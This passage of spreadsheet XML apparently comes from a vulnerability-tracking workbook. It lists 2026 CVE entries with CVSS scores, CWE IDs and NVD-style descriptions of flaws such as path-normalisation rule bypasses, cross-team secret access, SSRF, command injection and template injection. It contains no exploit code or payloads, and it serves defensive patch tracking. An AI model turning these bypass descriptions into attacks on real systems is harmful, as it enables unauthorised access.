      <c r="E801" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F801" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G801" s="5" t="inlineStr"/>
      <c r="H801" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I801" s="5" t="inlineStr"/>
      <c r="J801" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K801" s="5" t="inlineStr"/>
      <c r="L801" s="5" t="inlineStr"/>
      <c r="M801" s="5" t="inlineStr"/>
      <c r="N801" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O801" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P801" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q801" s="5" t="inlineStr"/>
      <c r="R801" s="5" t="inlineStr">
        <is>
          <t>CWE-180, CWE-863</t>
        </is>
      </c>
      <c r="S801" s="5" t="inlineStr">
        <is>
          <t>Lemonldap::NG::Handler versions from 2.0.0 before 2.16.10, from 2.17.0 before 2.21.6, from 2.22.0 before 2.23.4 for Perl allow an equivalent spelling of a path to bypass the locationRules that restrict it.
The handler matches each vhost's locationRules regular expressions against REQUEST_URI, the raw request line, while the web server routes on the path it has already percent-decoded and normalized. A request that percent-encodes a character of the path, inserts dot segments, or doubles a slash therefore reaches the protected resource under a URI that no rule regexp matches, and the vhost's default rule decides access. Deny rules, identity and group conditions, and unprotect and skip rules are bypassed alike.
Only a vhost whose default rule is more permissive than its other rules is affected. An authenticated user then reaches any URL a locationRules regexp was meant to restrict, but gains no more than that default rule already grants.</t>
        </is>
      </c>
      <c r="T801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95811</t>
        </is>
      </c>
    </row>
    <row r="802">
      <c r="A802" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B802" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97636</t>
        </is>
      </c>
      <c r="D802" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E802" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F802" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G802" s="5" t="inlineStr"/>
      <c r="H802" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I802" s="5" t="inlineStr"/>
      <c r="J802" s="5" t="inlineStr">
        <is>
          <t>hashicorp, gin</t>
        </is>
      </c>
      <c r="K802" s="5" t="inlineStr"/>
      <c r="L802" s="5" t="inlineStr"/>
      <c r="M802" s="5" t="inlineStr"/>
      <c r="N802" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O802" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P802" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q802" s="5" t="inlineStr"/>
      <c r="R802" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S802" s="5" t="inlineStr">
        <is>
          <t>Apache Airflow HashiCorp provider: the HashiCorp Vault secrets backend's team-scope guard can be bypassed with a user-controlled key. In a multi-team deployment, a Dag author scoped to one team can supply a Variable key containing a path separator that causes the backend to resolve a secret belonging to a different team, because after the team-scoped lookup misses the backend falls back to a team-agnostic path concatenated from the unvalidated key. The Execution API Variables route accepts a path-shaped key, so this is reachable from ordinary Dag code.
Affects multi-team deployments using the HashiCorp Vault secrets backend. Single-team deployments are not affected, as there is no cross-team boundary to cross. This is the same class as CVE-2026-86465, CVE-2026-68870, CVE-2026-68871 and CVE-2026-68872 in the Akeyless, Azure Key Vault, Yandex Lockbox and Amazon secrets backends.
Users of apache-airflow-providers-hashicorp are recommended to upgrade to version 4.8.0 or later, which fixes the issue.</t>
        </is>
      </c>
      <c r="T802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97636</t>
        </is>
      </c>
    </row>
    <row r="803">
      <c r="A803" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B803" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 6.0)</t>
        </is>
      </c>
      <c r="C803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93353</t>
        </is>
      </c>
      <c r="D803" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E803" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F803" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G803" s="5" t="inlineStr"/>
      <c r="H803" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I803" s="5" t="inlineStr"/>
      <c r="J803" s="5" t="inlineStr"/>
      <c r="K803" s="5" t="inlineStr"/>
      <c r="L803" s="5" t="inlineStr"/>
      <c r="M803" s="5" t="inlineStr"/>
      <c r="N803" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O803" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P803" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q803" s="5" t="inlineStr"/>
      <c r="R803" s="5" t="inlineStr">
        <is>
          <t>CWE-424, CWE-59</t>
        </is>
      </c>
      <c r="S803" s="5" t="inlineStr">
        <is>
          <t>copyparty contains a volume restriction bypass vulnerability in its SFTP front end that allows authenticated SFTP users to create, remove, and truncate arbitrary paths outside permitted volume boundaries by exploiting three handlers that bypass the xvol volflag enforcement. The _mkdir, _rmdir, and _chattr handlers construct destination paths using vfs.get(), vn.canonical(), and os.path.join() without invoking the chk_ap access check, enabling attackers to traverse symlinks leaving a volume's top directory and perform unauthorized file creation, deletion, or truncation via SSH_FXP_SETSTAT operations on paths outside any volume the account is authorized to access.</t>
        </is>
      </c>
      <c r="T803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93353</t>
        </is>
      </c>
    </row>
    <row r="804">
      <c r="A804" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B804" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88386</t>
        </is>
      </c>
      <c r="D804" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E804" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F804" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G804" s="5" t="inlineStr"/>
      <c r="H804" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I804" s="5" t="inlineStr"/>
      <c r="J804" s="5" t="inlineStr"/>
      <c r="K804" s="5" t="inlineStr"/>
      <c r="L804" s="5" t="inlineStr"/>
      <c r="M804" s="5" t="inlineStr"/>
      <c r="N804" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O804" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P804" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q804" s="5" t="inlineStr"/>
      <c r="R804" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S804" s="5" t="inlineStr">
        <is>
          <t>libsndfile 1.2.2 contains a misaligned memory access issue in psf_binheader_readf() while parsing WAV fmt chunks. A specially crafted WAV file can cause the function to cast an unaligned destination address to unsigned int * and perform a 4-byte store. This results in undefined behavior leading to denial of service.</t>
        </is>
      </c>
      <c r="T804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88386</t>
        </is>
      </c>
    </row>
    <row r="805">
      <c r="A805" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B805" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97326</t>
        </is>
      </c>
      <c r="D805" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E805" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F805" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G805" s="5" t="inlineStr"/>
      <c r="H805" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I805" s="5" t="inlineStr"/>
      <c r="J805" s="5" t="inlineStr"/>
      <c r="K805" s="5" t="inlineStr"/>
      <c r="L805" s="5" t="inlineStr"/>
      <c r="M805" s="5" t="inlineStr"/>
      <c r="N805" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O805" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P805" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q805" s="5" t="inlineStr"/>
      <c r="R805" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S805" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in songxinjianqwe Chat up to ac63d25297079eed5e4ba7e88d3b7a032637150d. Affected by this issue is some unknown functionality of the file chat-server/src/main/java/cn/sinjinsong/chat/server/ChatServer.java of the component chat-server. This manipulation causes server-side request forgery. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97326</t>
        </is>
      </c>
    </row>
    <row r="806">
      <c r="A806" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B806" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97646</t>
        </is>
      </c>
      <c r="D806" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E806" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F806" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G806" s="5" t="inlineStr"/>
      <c r="H806" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I806" s="5" t="inlineStr"/>
      <c r="J806" s="5" t="inlineStr">
        <is>
          <t>f5, php, hp</t>
        </is>
      </c>
      <c r="K806" s="5" t="inlineStr"/>
      <c r="L806" s="5" t="inlineStr"/>
      <c r="M806" s="5" t="inlineStr"/>
      <c r="N806" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O806" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P806" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q806" s="5" t="inlineStr"/>
      <c r="R806" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="S806" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in ningzichun student-management-system up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. This affects an unknown function of the file admin/fun/getStudent.php. This manipulation of the argument sid causes authorization bypass. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97646</t>
        </is>
      </c>
    </row>
    <row r="807">
      <c r="A807" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B807" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88370</t>
        </is>
      </c>
      <c r="D807" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E807" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F807" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G807" s="5" t="inlineStr"/>
      <c r="H807" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I807" s="5" t="inlineStr"/>
      <c r="J807" s="5" t="inlineStr"/>
      <c r="K807" s="5" t="inlineStr"/>
      <c r="L807" s="5" t="inlineStr"/>
      <c r="M807" s="5" t="inlineStr"/>
      <c r="N807" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O807" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P807" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q807" s="5" t="inlineStr"/>
      <c r="R807" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S807" s="5" t="inlineStr">
        <is>
          <t>libconfini 1.16.4 contains a heap out-of-bounds write condition involving the bundled load_ini_buffer.h utility and strip_ini_cache(). The bundled utility allocates exactly ini_length bytes, while strip_ini_cache() unconditionally writes a NUL terminator at ini_source[ini_length], requiring an additional writable byte. Applications using the bundled allocation pattern can trigger deterministic heap memory corruption when processing any non-empty INI input, resulting in denial of service.</t>
        </is>
      </c>
      <c r="T807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88370</t>
        </is>
      </c>
    </row>
    <row r="808">
      <c r="A808" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B808" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 5.3)</t>
        </is>
      </c>
      <c r="C808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97225</t>
        </is>
      </c>
      <c r="D808" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E808" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F808" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G808" s="5" t="inlineStr"/>
      <c r="H808" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I808" s="5" t="inlineStr"/>
      <c r="J808" s="5" t="inlineStr"/>
      <c r="K808" s="5" t="inlineStr"/>
      <c r="L808" s="5" t="inlineStr"/>
      <c r="M808" s="5" t="inlineStr"/>
      <c r="N808" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O808" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P808" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q808" s="5" t="inlineStr"/>
      <c r="R808" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-94</t>
        </is>
      </c>
      <c r="S808" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in DbGate up to 7.2.5-beta.5. This affects an unknown function of the file packages/api/src/controllers/runners.js of the component JSON Runner. Executing a manipulation of the argument comment.text/script.schedule can lead to code injection. The attack may be performed from remote. Upgrading to version 7.2.5-beta.6 mitigates this issue. This patch is called 70e7b6b58e464d7a015ba16e8d7574b420ee4877. Upgrading the affected component is advised. This issue is distinct from CVE-2026-47668.</t>
        </is>
      </c>
      <c r="T808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97225</t>
        </is>
      </c>
    </row>
    <row r="809">
      <c r="A809" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B809" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.4 → 5.1)</t>
        </is>
      </c>
      <c r="C809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48543</t>
        </is>
      </c>
      <c r="D809" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E809" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F809" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G809" s="5" t="inlineStr"/>
      <c r="H809" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I809" s="5" t="inlineStr"/>
      <c r="J809" s="5" t="inlineStr">
        <is>
          <t>express, vue, gin</t>
        </is>
      </c>
      <c r="K809" s="5" t="inlineStr"/>
      <c r="L809" s="5" t="inlineStr"/>
      <c r="M809" s="5" t="inlineStr"/>
      <c r="N809" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O809" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P809" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q809" s="5" t="inlineStr"/>
      <c r="R809" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S809" s="5" t="inlineStr">
        <is>
          <t>Krayin CRM through 2.2.6 contains a stored client-side template injection vulnerability that allows authenticated attackers to execute arbitrary JavaScript in other users' browsers by injecting Vue.js template expressions into the web form description field. Attackers can craft a web form description containing double-brace template syntax that reaches the Vue template compiler, enabling prototype chain traversal to retrieve the Function constructor and execute attacker-supplied JavaScript in the application origin for every user who views the affected web form.</t>
        </is>
      </c>
      <c r="T809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48543</t>
        </is>
      </c>
    </row>
    <row r="810">
      <c r="A810" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B810" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97320</t>
        </is>
      </c>
      <c r="D810" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E810" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F810" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G810" s="5" t="inlineStr"/>
      <c r="H810" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I810" s="5" t="inlineStr"/>
      <c r="J810" s="5" t="inlineStr">
        <is>
          <t>vue</t>
        </is>
      </c>
      <c r="K810" s="5" t="inlineStr"/>
      <c r="L810" s="5" t="inlineStr"/>
      <c r="M810" s="5" t="inlineStr"/>
      <c r="N810" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O810" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P810" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q810" s="5" t="inlineStr"/>
      <c r="R810" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S810" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in YunaiV/zhijiantianya ruoyi-vue-pro up to 2026.08. The affected element is the function AiKnowledgeDocumentServiceImpl.readUrl of the file AiKnowledgeDocumentServiceImpl.java of the component AI Knowledge Module. This manipulation of the argument url causes server-side request forgery. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97320</t>
        </is>
      </c>
    </row>
    <row r="811">
      <c r="A811" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B811" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 2.1)</t>
        </is>
      </c>
      <c r="C811" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97325</t>
        </is>
      </c>
      <c r="D811" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E811" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F811" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G811" s="5" t="inlineStr"/>
      <c r="H811" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I811" s="5" t="inlineStr"/>
      <c r="J811" s="5" t="inlineStr">
        <is>
          <t>vue</t>
        </is>
      </c>
      <c r="K811" s="5" t="inlineStr"/>
      <c r="L811" s="5" t="inlineStr"/>
      <c r="M811" s="5" t="inlineStr"/>
      <c r="N811" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O811" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P811" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q811" s="5" t="inlineStr"/>
      <c r="R811" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S811" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in YunaiV/zhijiantianya ruoyi-vue-pro up to 2026.08. Affected by this vulnerability is the function validOAuthClientFromCache of the file yudao-module-system/src/main/java/cn/iocoder/yudao/module/system/service/oauth2/OAuth2ClientServiceImpl.java of the component OAuth2 Client. The manipulation of the argument redirect_uri results in open redirect. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97325</t>
        </is>
      </c>
    </row>
    <row r="812">
      <c r="A812" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B812" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C812" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97366</t>
        </is>
      </c>
      <c r="D812" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E812" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F812" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G812" s="5" t="inlineStr"/>
      <c r="H812" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I812" s="5" t="inlineStr"/>
      <c r="J812" s="5" t="inlineStr">
        <is>
          <t>react</t>
        </is>
      </c>
      <c r="K812" s="5" t="inlineStr"/>
      <c r="L812" s="5" t="inlineStr"/>
      <c r="M812" s="5" t="inlineStr"/>
      <c r="N812" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O812" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P812" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q812" s="5" t="inlineStr"/>
      <c r="R812" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S812" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in jhen0409 react-native-debugger up to 0.14.0. The impacted element is the function openDevTools of the file electron/window.js of the component Open in Editor Handler. The manipulation of the argument host results in os command injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97366</t>
        </is>
      </c>
    </row>
    <row r="813">
      <c r="A813" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B813" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C813" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97368</t>
        </is>
      </c>
      <c r="D813" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E813" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F813" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G813" s="5" t="inlineStr"/>
      <c r="H813" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I813" s="5" t="inlineStr"/>
      <c r="J813" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K813" s="5" t="inlineStr"/>
      <c r="L813" s="5" t="inlineStr"/>
      <c r="M813" s="5" t="inlineStr"/>
      <c r="N813" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O813" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P813" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q813" s="5" t="inlineStr"/>
      <c r="R813" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="S813" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in chillzhuang SpringBlade up to 5.0.2. This affects the function UserServiceImpl.userInfo of the file blade-service/blade-system/src/main/java/org/springblade/system/service/impl/UserServiceImpl.java of the component user-auth-info Endpoint. This manipulation of the argument userId causes authorization bypass. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. CVE-2026-56100 and CVE-2026-36765 are distinct issues. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97368</t>
        </is>
      </c>
    </row>
    <row r="814">
      <c r="A814" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B814" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 2.1)</t>
        </is>
      </c>
      <c r="C814" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97648</t>
        </is>
      </c>
      <c r="D814" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E814" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F814" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G814" s="5" t="inlineStr"/>
      <c r="H814" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I814" s="5" t="inlineStr"/>
      <c r="J814" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K814" s="5" t="inlineStr"/>
      <c r="L814" s="5" t="inlineStr"/>
      <c r="M814" s="5" t="inlineStr"/>
      <c r="N814" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O814" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P814" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q814" s="5" t="inlineStr"/>
      <c r="R814" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-862</t>
        </is>
      </c>
      <c r="S814" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in ningzichun student-management-system up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected is an unknown function. Performing a manipulation results in cross-site request forgery. It is possible to initiate the attack remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97648</t>
        </is>
      </c>
    </row>
    <row r="815">
      <c r="A815" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B815" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 2.1)</t>
        </is>
      </c>
      <c r="C815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97650</t>
        </is>
      </c>
      <c r="D815" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E815" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F815" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G815" s="5" t="inlineStr"/>
      <c r="H815" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I815" s="5" t="inlineStr"/>
      <c r="J815" s="5" t="inlineStr">
        <is>
          <t>f5, php, hp</t>
        </is>
      </c>
      <c r="K815" s="5" t="inlineStr"/>
      <c r="L815" s="5" t="inlineStr"/>
